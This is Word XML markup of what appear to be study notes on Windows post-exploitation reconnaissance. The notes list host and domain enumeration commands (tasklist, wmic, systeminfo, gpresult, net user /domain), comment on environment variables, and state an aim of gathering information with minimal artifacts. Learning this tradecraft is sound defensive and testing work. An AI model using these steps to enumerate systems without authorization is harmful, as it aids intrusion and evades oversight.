    <w:p w14:paraId="1937A340" w14:textId="2D2A35DC" w:rsidR="007B3D1E" w:rsidRPr="00A80F4F" w:rsidRDefault="007F5232" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ower of </w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>xtrapolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067EA073" w14:textId="2ED447B2" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">what is the command tool, or option that will </w:t>
      </w:r>
      <w:r w:rsidR="002C42B1" w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>let</w:t>
      </w:r>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> us the most possible info with the least amount of artifact generation</w:t>
      </w:r>
      <w:r w:rsidR="002C42B1" w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE1938" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7A5115" w14:textId="62DF9564" w:rsidR="007B3D1E" w:rsidRPr="00A80F4F" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3885875E" w14:textId="03EAD946" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tasklist /v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6FAD6" w14:textId="1F20D082" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">what user is running that </w:t>
      </w:r>
      <w:r w:rsidR="002C42B1" w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidR="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1CDD8" w14:textId="255A9CCD" w:rsidR="007B3D1E" w:rsidRPr="00A80F4F" w:rsidRDefault="002C42B1" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547292BC" w14:textId="5C499A49" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="00A80F4F" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>et-process - powershell command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A742A23" w14:textId="0256F034" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wmic process - wmic needs to be initiated</w:t>
      </w:r>
      <w:r w:rsidR="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65815382" w14:textId="52C67C43" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">task manager </w:t>
      </w:r>
      <w:r w:rsidR="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D976A" w14:textId="0973B5D5" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>pslist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60569AA4" w14:textId="1C84A172" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>process explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75777D50" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040F49F2" w14:textId="3178E0D2" w:rsidR="007B3D1E" w:rsidRPr="00A80F4F" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ENVIRONMENTAL VARIABLES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59948155" w14:textId="790C27F1" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31329177" w14:textId="2EDF18DC" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C03582B" w14:textId="18836CE2" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wmic bios [list full]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A76F0" w14:textId="3AB2C981" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>gpresult /z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54919ED7" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71878D26" w14:textId="25495DA6" w:rsidR="007B3D1E" w:rsidRPr="00A80F4F" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>USERDOMAIN - domain name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783ECBFC" w14:textId="09D454AF" w:rsidR="007B3D1E" w:rsidRPr="00A80F4F" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>USERNAME - every company does it differently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C247304" w14:textId="39389CC4" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">if you are rob@company, small </w:t>
      </w:r>
      <w:r w:rsidR="002C42B1" w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>comp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D2CA8" w14:textId="03D0CC02" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">rob.fuller@company, large </w:t>
      </w:r>
      <w:r w:rsidR="00A80F4F" w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>comp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86F875" w14:textId="11795CB6" w:rsidR="007B3D1E" w:rsidRPr="002C42B1" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">rob.fuller5@... huge </w:t>
      </w:r>
      <w:r w:rsidR="00A80F4F" w:rsidRPr="002C42B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>comp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F668A8" w14:textId="509A7DF0" w:rsidR="007B3D1E" w:rsidRPr="00A80F4F" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">USERPROFILE - roaming profiles allows desktops, docs, </w:t>
      </w:r>
      <w:r w:rsidR="00A80F4F" w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>etc.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to move from machine to </w:t>
      </w:r>
      <w:r w:rsidR="002C42B1" w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619F22A" w14:textId="4A712DF3" w:rsidR="007B3D1E" w:rsidRPr="004C72D5" w:rsidRDefault="004C72D5" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C72D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="004C72D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled, it's gonna point to a share and not a local </w:t>
      </w:r>
      <w:r w:rsidR="002C42B1" w:rsidRPr="004C72D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6BF5C5" w14:textId="2D69A85F" w:rsidR="007B3D1E" w:rsidRPr="00A80F4F" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>HOMEPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C06F77" w14:textId="78AA6690" w:rsidR="007B3D1E" w:rsidRPr="00A80F4F" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">LOGONSERVER - domain controller that authenticated </w:t>
      </w:r>
      <w:r w:rsidR="004C72D5" w:rsidRPr="00A80F4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75810D75" w14:textId="72FF18DB" w:rsidR="007B3D1E" w:rsidRPr="004C72D5" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C72D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>useful because it connects based on speed, what is the fastest to connect to (closest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE2A8D" w14:textId="7038C8B2" w:rsidR="007B3D1E" w:rsidRPr="004C72D5" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C72D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">might not be firewalled </w:t>
      </w:r>
      <w:r w:rsidR="00A80F4F" w:rsidRPr="004C72D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E3568A" w14:textId="4BD702E6" w:rsidR="007B3D1E" w:rsidRPr="00777FA4" w:rsidRDefault="007B3D1E" w:rsidP="00777FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">COMPUTERNAME </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7BB496" w14:textId="0D121CE3" w:rsidR="007B3D1E" w:rsidRPr="00777FA4" w:rsidRDefault="007B3D1E" w:rsidP="00777FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>APPDATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCBD122" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F22DBE5" w14:textId="0A0EA46D" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>USERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075AB22B" w14:textId="731B927D" w:rsidR="007B3D1E" w:rsidRPr="00777FA4" w:rsidRDefault="007B3D1E" w:rsidP="00777FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D71C428" w14:textId="0E3F4713" w:rsidR="007B3D1E" w:rsidRPr="00777FA4" w:rsidRDefault="007B3D1E" w:rsidP="00777FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777FA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>net user /domain</w:t>
      </w:r>
    </w:p>
